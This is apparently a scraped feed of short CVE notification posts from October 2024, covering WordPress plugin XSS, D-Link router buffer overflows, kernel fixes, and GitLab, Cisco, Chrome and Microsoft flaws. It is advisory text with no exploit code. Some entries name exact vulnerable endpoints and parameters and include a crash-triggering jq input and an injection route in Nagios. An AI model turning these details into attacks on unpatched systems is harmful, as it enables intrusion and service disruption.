🚨 CVE-2023-7233The GigPress WordPress plugin through 2.3.29 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-10-09 15:37:31 |
🚨 CVE-2023-49355decToString in decNumber/decNumber.c in jq 88f01a7 has a one-byte out-of-bounds write via the " []-1.2e-1111111111" input. NOTE: this is not the same as CVE-2023-50246. The CVE-2023-50246 71c2ab5 reference mentions -10E-1000010001, which is not in normalized scientific notation.🎖@cveNotify |
|
| 2024-10-09 15:37:30 |
🚨 CVE-2023-48398In ProtocolNetAcBarringInfo::ProtocolNetAcBarringInfo() of protocolnetadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-10-09 15:07:36 |
🚨 CVE-2024-45001In the Linux kernel, the following vulnerability has been resolved:net: mana: Fix RX buf alloc_size alignment and atomic op panicThe MANA driver's RX buffer alloc_size is passed into napi_build_skb() tocreate SKB. skb_shinfo(skb) is located at the end of skb, and its alignmentis affected by the alloc_size passed into napi_build_skb(). The size needsto be aligned properly for better performance and atomic operations.Otherwise, on ARM64 CPU, for certain MTU settings like 4000, atomicoperations may panic on the skb_shinfo(skb)->dataref due to alignment fault.To fix this bug, add proper alignment to the alloc_size calculation.Sample panic info:[ 253.298819] Unable to handle kernel paging request at virtual address ffff000129ba5cce[ 253.300900] Mem abort info:[ 253.301760] ESR = 0x0000000096000021[ 253.302825] EC = 0x25: DABT (current EL), IL = 32 bits[ 253.304268] SET = 0, FnV = 0[ 253.305172] EA = 0, S1PTW = 0[ 253.306103] FSC = 0x21: alignment faultCall trace: __skb_clone+0xfc/0x198 skb_clone+0x78/0xe0 raw6_local_deliver+0xfc/0x228 ip6_protocol_deliver_rcu+0x80/0x500 ip6_input_finish+0x48/0x80 ip6_input+0x48/0xc0 ip6_sublist_rcv_finish+0x50/0x78 ip6_sublist_rcv+0x1cc/0x2b8 ipv6_list_rcv+0x100/0x150 __netif_receive_skb_list_core+0x180/0x220 netif_receive_skb_list_internal+0x198/0x2a8 __napi_poll+0x138/0x250 net_rx_action+0x148/0x330 handle_softirqs+0x12c/0x3a0🎖@cveNotify |
|
| 2024-10-09 15:07:35 |
🚨 CVE-2023-6082The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-10-09 15:07:31 |
🚨 CVE-2023-6081The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-10-09 15:07:30 |
🚨 CVE-2021-1647Microsoft Defender Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-09 15:07:29 |
🚨 CVE-2016-3427Unspecified vulnerability in Oracle Java SE 6u113, 7u99, and 8u77; Java SE Embedded 8u77; and JRockit R28.3.9 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to JMX.🎖@cveNotify |
|
| 2024-10-09 14:07:46 |
🚨 CVE-2024-44949In the Linux kernel, the following vulnerability has been resolved:parisc: fix a possible DMA corruptionARCH_DMA_MINALIGN was defined as 16 - this is too small - it may bepossible that two unrelated 16-byte allocations share a cache line. Ifone of these allocations is written using DMA and the other is writtenusing cached write, the value that was written with DMA may becorrupted.This commit changes ARCH_DMA_MINALIGN to be 128 on PA20 and 32 on PA1.1 -that's the largest possible cache line size.As different parisc microarchitectures have different cache line size, wedefine arch_slab_minalign(), cache_line_size() anddma_get_cache_alignment() so that the kernel may tune slab cacheparameters dynamically, based on the detected cache line size.🎖@cveNotify |
|
| 2024-10-09 14:07:45 |
🚨 CVE-2022-31696VMware ESXi contains a memory corruption vulnerability that exists in the way it handles a network socket. A malicious actor with local access to ESXi may exploit this issue to corrupt memory leading to an escape of the ESXi sandbox.🎖@cveNotify |
|
| 2024-10-09 14:07:44 |
🚨 CVE-2022-22590A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-10-09 13:37:29 |
🚨 CVE-2024-45720On Windows platforms, a "best fit" character encoding conversion of command line arguments to Subversion's executables (e.g., svn.exe, etc.) may lead to unexpected command line argument interpretation, including argument injection and execution of other programs, if a specially crafted command line argument string is processed.All versions of Subversion up to and including Subversion 1.14.3 are affected on Windows platforms only. Users are recommended to upgrade to version Subversion 1.14.4, which fixes this issue.Subversion is not affected on UNIX-like platforms.🎖@cveNotify |
|
| 2024-10-09 13:37:26 |
🚨 CVE-2024-1160The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Link in all versions up to, and including, 4.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-09 13:37:25 |
🚨 CVE-2024-0248The EazyDocs WordPress plugin before 2.4.0 re-introduced CVE-2023-6029 (https://wpscan.com/vulnerability/7a0aaf85-8130-4fd7-8f09-f8edc929597e/) in 2.3.8, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections. The issue was partially fixed in 2.3.9.🎖@cveNotify |
|
| 2024-10-09 13:37:24 |
🚨 CVE-2023-6294The Popup Builder WordPress plugin before 4.2.6 does not validate a parameter before making a request to it, which could allow users with the administrator role to perform SSRF attack in Multisite WordPress configurations.🎖@cveNotify |
|
| 2024-10-09 13:07:44 |
🚨 CVE-2024-9568A vulnerability, which was classified as critical, was found in D-Link DIR-619L B1 2.06. Affected is the function formAdvNetwork of the file /goform/formAdvNetwork. The manipulation of the argument curTime leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 12:37:31 |
🚨 CVE-2024-28168Improper Restriction of XML External Entity Reference ('XXE') vulnerability in Apache XML Graphics FOP.This issue affects Apache XML Graphics FOP: 2.9.Users are recommended to upgrade to version 2.10, which fixes the issue.🎖@cveNotify |
|
| 2024-10-09 12:07:25 |
🚨 CVE-2022-0845Code Injection in GitHub repository pytorchlightning/pytorch-lightning prior to 1.6.0.🎖@cveNotify |
|
| 2024-10-09 12:07:24 |
🚨 CVE-2021-4118pytorch-lightning is vulnerable to Deserialization of Untrusted Data🎖@cveNotify |
|
| 2024-10-09 11:37:38 |
🚨 CVE-2024-9553A vulnerability classified as critical has been found in D-Link DIR-605L 2.13B01 BETA. This affects the function formdumpeasysetup of the file /goform/formdumpeasysetup. The manipulation of the argument curTime leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 11:37:32 |
🚨 CVE-2024-9552A vulnerability was found in D-Link DIR-605L 2.13B01 BETA. It has been rated as critical. Affected by this issue is the function formSetWanNonLogin of the file /goform/formSetWanNonLogin. The manipulation of the argument webpage leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 11:37:31 |
🚨 CVE-2024-9549A vulnerability was found in D-Link DIR-605L 2.13B01 BETA and classified as critical. This issue affects the function formEasySetupWizard/formEasySetupWizard2 of the file /goform/formEasySetupWizard. The manipulation of the argument curTime leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 11:37:30 |
🚨 CVE-2024-9535A vulnerability was found in D-Link DIR-605L 2.13B01 BETA. It has been declared as critical. Affected by this vulnerability is the function formEasySetupWWConfig of the file /goform/formEasySetupWWConfig. The manipulation of the argument curTime leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 11:37:26 |
🚨 CVE-2024-9533A vulnerability was found in D-Link DIR-605L 2.13B01 BETA and classified as critical. This issue affects the function formDeviceReboot of the file /goform/formDeviceReboot. The manipulation of the argument next_page leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 11:37:25 |
🚨 CVE-2024-9514A vulnerability was found in D-Link DIR-605L 2.13B01 BETA. It has been declared as critical. This vulnerability affects the function formSetDomainFilter of the file /goform/formSetDomainFilter. The manipulation of the argument curTime leads to buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-10-09 10:37:32 |
🚨 CVE-2024-47414Animate versions 23.0.7, 24.0.4 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-10-09 10:37:25 |
🚨 CVE-2024-47410Animate versions 23.0.7, 24.0.4 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-10-09 10:37:24 |
🚨 CVE-2024-45145Lightroom Desktop versions 7.4.1, 13.5, 12.5.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-10-09 08:37:24 |
🚨 CVE-2024-9451The Embed PDF Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'height' and 'width' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-09 07:37:32 |
🚨 CVE-2024-39586Dell AppSync Server, version 4.3 through 4.6, contains an XML External Entity Injection vulnerability. An adjacent high privileged attacker could potentially exploit this vulnerability, leading to information disclosure.🎖@cveNotify |
|
| 2024-10-09 07:37:26 |
🚨 CVE-2024-39440In DRM service, there is a possible system crash due to null pointer dereference. This could lead to local denial of service with System execution privileges needed.🎖@cveNotify |
|
| 2024-10-09 07:37:25 |
🚨 CVE-2024-39437In linkturbonative service, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed.🎖@cveNotify |
|
| 2024-10-09 07:37:24 |
🚨 CVE-2024-39436In linkturbonative service, there is a possible command injection due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed.🎖@cveNotify |
|
| 2024-10-09 06:37:32 |
🚨 CVE-2023-46586cgi.c in weborf .0.17, 0.18, 0.19, and 0.20 (before 1.0) lacks '\0' termination of the path for CGI scripts because strncpy is misused.🎖@cveNotify |
|
| 2024-10-09 06:37:26 |
🚨 CVE-2023-45872An issue was discovered in Qt before 6.2.11 and 6.3.x through 6.6.x before 6.6.1. When a QML image refers to an image whose content is not known yet, there is an assumption that it is an SVG document, leading to a denial of service (application crash) if it is not actually an SVG document.🎖@cveNotify |
|
| 2024-10-09 06:37:25 |
🚨 CVE-2023-37154check_by_ssh in Nagios nagios-plugins 2.4.5 allows arbitrary command execution via ProxyCommand, LocalCommand, and PermitLocalCommand with \${IFS}. This has been categorized both as fixed in e8810de, and as intended behavior.🎖@cveNotify |
|
| 2024-10-09 06:37:24 |
🚨 CVE-2023-36325i2p before 2.3.0 (Java) allows de-anonymizing the public IPv4 and IPv6 addresses of i2p hidden services (aka eepsites) via a correlation attack across the IPv4 and IPv6 addresses that occurs when a tunneled, replayed message has a behavior discrepancy (it may be dropped, or may result in a Wrong Destination response). An attack would take days to complete.🎖@cveNotify |
|
| 2024-10-09 05:37:25 |
🚨 CVE-2024-42934OpenIPMI before 2.0.36 has an out-of-bounds array access (for authentication type) in the ipmi_sim simulator, resulting in denial of service or (with very low probability) authentication bypass or code execution.🎖@cveNotify |
|
| 2024-10-09 05:37:24 |
🚨 CVE-2024-32608HDF5 library through 1.14.3 has memory corruption in H5A__close resulting in the corruption of the instruction pointer and causing denial of service or potential code execution.🎖@cveNotify |
|
| 2024-10-09 02:37:25 |
🚨 CVE-2024-21413Microsoft Outlook Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-09 02:37:24 |
🚨 CVE-2024-21338Windows Kernel Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-10-09 01:07:42 |
🚨 CVE-2024-43047Memory corruption while maintaining memory maps of HLOS memory.🎖@cveNotify |
|
| 2024-10-08 23:37:25 |
🚨 CVE-2024-9603Type Confusion in V8 in Google Chrome prior to 129.0.6668.100 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-08 23:37:24 |
🚨 CVE-2024-9602Type Confusion in V8 in Google Chrome prior to 129.0.6668.100 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-08 22:07:26 |
🚨 CVE-2024-8802The Clio Grow plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.0.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-08 22:07:25 |
🚨 CVE-2024-20381A vulnerability in the JSON-RPC API feature in Cisco Crosswork Network Services Orchestrator (NSO) and ConfD that is used by the web-based management interfaces of Cisco Optical Site Manager and Cisco RV340 Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to modify the configuration of an affected application or device. This vulnerability is due to improper authorization checks on the API. An attacker with privileges sufficient to access the affected application or device could exploit this vulnerability by sending malicious requests to the JSON-RPC API. A successful exploit could allow the attacker to make unauthorized modifications to the configuration of the affected application or device, including creating new user accounts or elevating their own privileges on an affected system.🎖@cveNotify |
|
| 2024-10-08 22:07:24 |
🚨 CVE-2024-1881AutoGPT, a component of significant-gravitas/autogpt, is vulnerable to an improper neutralization of special elements used in an OS command ('OS Command Injection') due to a flaw in its shell command validation function. Specifically, the vulnerability exists in versions v0.5.0 up to but not including 5.1.0. The issue arises from the application's method of validating shell commands against an allowlist or denylist, where it only checks the first word of the command. This allows an attacker to bypass the intended restrictions by crafting commands that are executed despite not being on the allowlist or by including malicious commands not present in the denylist. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary shell commands.🎖@cveNotify |
|
| 2024-10-08 21:37:26 |
🚨 CVE-2024-20513A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a DoS condition for targeted users of the AnyConnect service on an affected device.This vulnerability is due to insufficient entropy for handlers that are used during SSL VPN session establishment. An unauthenticated attacker could exploit this vulnerability by brute forcing valid session handlers. An authenticated attacker could exploit this vulnerability by connecting to the AnyConnect VPN service of an affected device to retrieve a valid session handler and, based on that handler, predict further valid session handlers. The attacker would then send a crafted HTTPS request using the brute-forced or predicted session handler to the AnyConnect VPN server of the device. A successful exploit could allow the attacker to terminate targeted SSL VPN sessions, forcing remote users to initiate new VPN connections and reauthenticate.🎖@cveNotify |
|
| 2024-10-08 21:37:25 |
🚨 CVE-2023-45192IBM Engineering Requirements Management DOORS Next 7.0.2 and 7.0.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 268758.🎖@cveNotify |
|
| 2024-10-08 21:37:24 |
🚨 CVE-2023-34468The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution.The resolution validates the Database URL and rejects H2 JDBC locations.You are recommended to upgrade to version 1.22.0 or later which fixes this issue.🎖@cveNotify |
|
| 2024-10-08 21:07:26 |
🚨 CVE-2024-30481Broken Access Control vulnerability in Samuel Marshall JCH Optimize.This issue affects JCH Optimize: from n/a through 4.0.0.🎖@cveNotify |
|
| 2024-10-08 21:07:25 |
🚨 CVE-2024-30466Missing Authorization vulnerability in OnTheGoSystems WooCommerce Multilingual & Multicurrency.This issue affects WooCommerce Multilingual & Multicurrency: from n/a through 5.3.4.🎖@cveNotify |
|
| 2024-10-08 20:37:32 |
🚨 CVE-2023-49140Denial-of-service (DoS) vulnerability exists in commplex-link service of HMI GC-A2 series. If a remote unauthenticated attacker sends a specially crafted packets to specific ports, a denial-of-service (DoS) condition may occur.🎖@cveNotify |
|
| 2024-10-08 20:37:26 |
🚨 CVE-2023-49695OS command injection vulnerability in WRC-X3000GSN v1.0.2, WRC-X3000GS v1.0.24 and earlier, and WRC-X3000GSA v1.0.24 and earlier allows a network-adjacent attacker with an administrative privilege to execute an arbitrary OS command by sending a specially crafted request to the product.🎖@cveNotify |
|
| 2024-10-08 20:37:25 |
🚨 CVE-2023-1820Heap buffer overflow in Browser History in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-10-08 20:37:24 |
🚨 CVE-2023-1815Use after free in Networking APIs in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-10-08 20:07:33 |
🚨 CVE-2023-2030An issue has been discovered in GitLab CE/EE affecting all versions from 12.2 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which an attacker could potentially modify the metadata of signed commits.🎖@cveNotify |
|
| 2024-10-08 20:07:26 |
🚨 CVE-2023-4647An issue has been discovered in GitLab affecting all versions starting from 15.2 before 16.1.5, all versions starting from 16.2 before 16.2.5, all versions starting from 16.3 before 16.3.1 in which the projects API pagination can be skipped, potentially leading to DoS on certain instances.🎖@cveNotify |
|
| 2024-10-08 20:07:25 |
🚨 CVE-2023-2485An issue has been discovered in GitLab CE/EE affecting all versions starting from 14.1 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. A malicious maintainer in a project can escalate other users to Owners in that project if they import members from another project that those other users are Owners of.🎖@cveNotify |
|
| 2024-10-08 20:07:24 |
🚨 CVE-2023-1825An issue has been discovered in GitLab EE affecting all versions starting from 15.7 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2. It was possible to disclose issue notes to an unauthorized user at project export.🎖@cveNotify |
|
| 2024-10-08 19:37:32 |
🚨 CVE-2023-0121A denial of service issue was discovered in GitLab CE/EE affecting all versions starting from 13.2.4 before 15.10.8, all versions starting from 15.11 before 15.11.7, all versions starting from 16.0 before 16.0.2 which allows an attacker to cause high resource consumption using malicious test report artifacts.🎖@cveNotify |
|
| 2024-10-08 19:37:26 |
🚨 CVE-2023-0921A lack of length validation in GitLab CE/EE affecting all versions from 8.3 before 15.10.8, 15.11 before 15.11.7, and 16.0 before 16.0.2 allows an authenticated attacker to create a large Issue description via GraphQL which, when repeatedly requested, saturates CPU usage.🎖@cveNotify |
|
| 2024-10-08 19:37:25 |
🚨 CVE-2023-1810Heap buffer overflow in Visuals in Google Chrome prior to 112.0.5615.49 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-08 19:37:24 |
🚨 CVE-2023-1534Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-10-08 19:07:33 |
🚨 CVE-2024-8800The RabbitLoader – Website Speed Optimization for improving Core Web Vital metrics with Cache, Image Optimization, and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.21.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-08 19:07:26 |
🚨 CVE-2023-6736An issue has been discovered in GitLab EE affecting all versions starting from 11.3 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. It was possible for an attacker to cause a client-side denial of service using malicious crafted content in the CODEOWNERS file.🎖@cveNotify |
|
| 2024-10-08 19:07:25 |
🚨 CVE-2023-5825An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.2 before 16.3.6, all versions starting from 16.4 before 16.4.2, all versions starting from 16.5 before 16.5.1. A low-privileged attacker can point a CI/CD Component to an incorrect path and cause the server to exhaust all available memory through an infinite loop and cause Denial of Service.🎖@cveNotify |
|
| 2024-10-08 18:37:38 |
🚨 CVE-2024-37869File Upload vulnerability in Itsourcecode Online Discussion Forum Project v.1.0 allows a remote attacker to execute arbitrary code via the "poster.php" file, and the uploaded file was received using the "$- FILES" variable🎖@cveNotify |
|
| 2024-10-08 18:37:32 |
🚨 CVE-2024-37868File Upload vulnerability in Itsourcecode Online Discussion Forum Project v.1.0 allows a remote attacker to execute arbitrary code via the "sendreply.php" file, and the uploaded file was received using the "$- FILES" variable.🎖@cveNotify |
|
| 2024-10-08 18:37:31 |
🚨 CVE-2024-20499Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a DoS condition in the AnyConnect service on an affected device.These vulnerabilities are due to insufficient validation of client-supplied parameters while establishing an SSL VPN session. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request to the VPN server of an affected device. A successful exploit could allow the attacker to cause the Cisco AnyConnect VPN server to restart, resulting in the failure of the established SSL VPN connections and forcing remote users to initiate a new VPN connection and reauthenticate. A sustained attack could prevent new SSL VPN connections from being established.Note: When the attack traffic stops, the Cisco AnyConnect VPN server recovers gracefully without requiring manual intervention.🎖@cveNotify |
|
| 2024-10-08 18:37:30 |
🚨 CVE-2024-20498Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a DoS condition in the AnyConnect service on an affected device.These vulnerabilities are due to insufficient validation of client-supplied parameters while establishing an SSL VPN session. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request to the VPN server of an affected device. A successful exploit could allow the attacker to cause the Cisco AnyConnect VPN server to restart, resulting in the failure of the established SSL VPN connections and forcing remote users to initiate a new VPN connection and reauthenticate. A sustained attack could prevent new SSL VPN connections from being established.Note: When the attack traffic stops, the Cisco AnyConnect VPN server recovers gracefully without requiring manual intervention.🎖@cveNotify |
|
| 2024-10-08 18:37:26 |
🚨 CVE-2024-46843In the Linux kernel, the following vulnerability has been resolved:scsi: ufs: core: Remove SCSI host only if addedIf host tries to remove ufshcd driver from a UFS device it would cause akernel panic if ufshcd_async_scan fails during ufshcd_probe_hba beforeadding a SCSI host with scsi_add_host and MCQ is enabled since SCSI hosthas been defered after MCQ configuration introduced by commit 0cab4023ec7b("scsi: ufs: core: Defer adding host to SCSI if MCQ is supported").To guarantee that SCSI host is removed only if it has been added, set thescsi_host_added flag to true after adding a SCSI host and check whether itis set or not before removing it.🎖@cveNotify |
|
| 2024-10-08 18:37:25 |
🚨 CVE-2024-46840In the Linux kernel, the following vulnerability has been resolved:btrfs: clean up our handling of refs == 0 in snapshot deleteIn reada we BUG_ON(refs == 0), which could be unkind since we aren'tholding a lock on the extent leaf and thus could get a transientincorrect answer. In walk_down_proc we also BUG_ON(refs == 0), whichcould happen if we have extent tree corruption. Change that to return-EUCLEAN. In do_walk_down() we catch this case and handle it correctly,however we return -EIO, which -EUCLEAN is a more appropriate error code.Finally in walk_up_proc we have the same BUG_ON(refs == 0), so convertthat to proper error handling. Also adjust the error message so we canactually do something with the information.🎖@cveNotify |
|
| 2024-10-08 18:07:25 |
🚨 CVE-2024-20499Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a DoS condition in the AnyConnect service on an affected device.These vulnerabilities are due to insufficient validation of client-supplied parameters while establishing an SSL VPN session. An attacker could exploit these vulnerabilities by sending a crafted HTTPS request to the VPN server of an affected device. A successful exploit could allow the attacker to cause the Cisco AnyConnect VPN server to restart, resulting in the failure of the established SSL VPN connections and forcing remote users to initiate a new VPN connection and reauthenticate. A sustained attack could prevent new SSL VPN connections from being established.Note: When the attack traffic stops, the Cisco AnyConnect VPN server recovers gracefully without requiring manual intervention.🎖@cveNotify |
|
| 2024-10-08 18:07:24 |
🚨 CVE-2024-9172The Demo Importer Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-10-08 17:37:40 |
🚨 CVE-2021-1648Microsoft splwow64 Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-10-08 17:37:33 |
🚨 CVE-2021-1644HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-08 17:37:32 |
🚨 CVE-2021-1643HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-08 17:37:28 |
🚨 CVE-2021-1641Microsoft SharePoint Server Spoofing Vulnerability🎖@cveNotify |
|
| 2024-10-08 17:37:27 |
🚨 CVE-2021-1636Microsoft SQL Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-10-08 17:07:25 |
🚨 CVE-2024-24887Cross-Site Request Forgery (CSRF) vulnerability in Contest Gallery Photos and Files Contest Gallery – Contact Form, Upload Form, Social Share and Voting Plugin for WordPress.This issue affects Photos and Files Contest Gallery – Contact Form, Upload Form, Social Share and Voting Plugin for WordPress: from n/a through 21.2.8.4.🎖@cveNotify |
|
| 2024-10-08 17:07:24 |
🚨 CVE-2024-23512Deserialization of Untrusted Data vulnerability in wpxpo ProductX – WooCommerce Builder & Gutenberg WooCommerce Blocks.This issue affects ProductX – WooCommerce Builder & Gutenberg WooCommerce Blocks: from n/a through 3.1.4.🎖@cveNotify |
|
| 2024-10-08 16:37:43 |
🚨 CVE-2024-9306The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 10.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. In addition, site administrators have the option to grant lower-level users with access to manage the plugin's settings which may extend this vulnerability to those users.🎖@cveNotify |
|
| 2024-10-08 16:37:42 |
🚨 CVE-2024-20515A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device.This vulnerability is due to a lack of proper data protection mechanisms for certain configuration settings. An attacker with Read-Only Administrator privileges could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to view device credentials that are normally not visible to Read-Only Administrators.🎖@cveNotify |
|
| 2024-10-08 16:37:37 |
🚨 CVE-2022-49039Out-of-bounds write vulnerability in backup task management functionality in Synology Drive Client before 3.4.0-15721 allows local users with administrator privileges to execute arbitrary commands via unspecified vectors.🎖@cveNotify |
|
| 2024-10-08 16:37:36 |
🚨 CVE-2024-20434A vulnerability in Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on the control plane of an affected device. This vulnerability is due to improper handling of frames with VLAN tag information. An attacker could exploit this vulnerability by sending crafted frames to an affected device. A successful exploit could allow the attacker to render the control plane of the affected device unresponsive. The device would not be accessible through the console or CLI, and it would not respond to ping requests, SNMP requests, or requests from other control plane protocols. Traffic that is traversing the device through the data plane is not affected. A reload of the device is required to restore control plane services.🎖@cveNotify |
|
| 2024-10-08 16:37:31 |
🚨 CVE-2024-24797Deserialization of Untrusted Data vulnerability in G5Theme ERE Recently Viewed – Essential Real Estate Add-On.This issue affects ERE Recently Viewed – Essential Real Estate Add-On: from n/a through 1.3.🎖@cveNotify |
|
| 2024-10-08 16:37:30 |
🚨 CVE-2024-21312.NET Framework Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-10-08 16:37:26 |
🚨 CVE-2024-20697Windows Libarchive Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-10-08 16:07:35 |
🚨 CVE-2024-42417Delta Electronics DIAEnergie is vulnerable to an SQL injection in the script Handler_CFG.ashx. An authenticated attacker may be able to exploit this issue to cause delay in the targeted product.🎖@cveNotify |
|
| 2024-10-08 16:07:28 |
🚨 CVE-2024-20491A vulnerability in a logging function of Cisco Nexus Dashboard Insights could allow an attacker with access to a tech support file to view sensitive information.This vulnerability exists because remote controller credentials are recorded in an internal log that is stored in the tech support file. An attacker could exploit this vulnerability by accessing a tech support file that is generated from an affected system. A successful exploit could allow the attacker to view remote controller admin credentials in clear text.Note: Best practice is to store debug logs and tech support files safely and to share them only with trusted parties because they may contain sensitive information.🎖@cveNotify |
|
| 2024-10-08 16:07:27 |
🚨 CVE-2022-49041Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in backup task management functionality in Synology Drive Client before 3.4.0-15721 allows local users with administrator privileges to crash the client via unspecified vectors.🎖@cveNotify |
|
| 2024-10-08 16:07:26 |
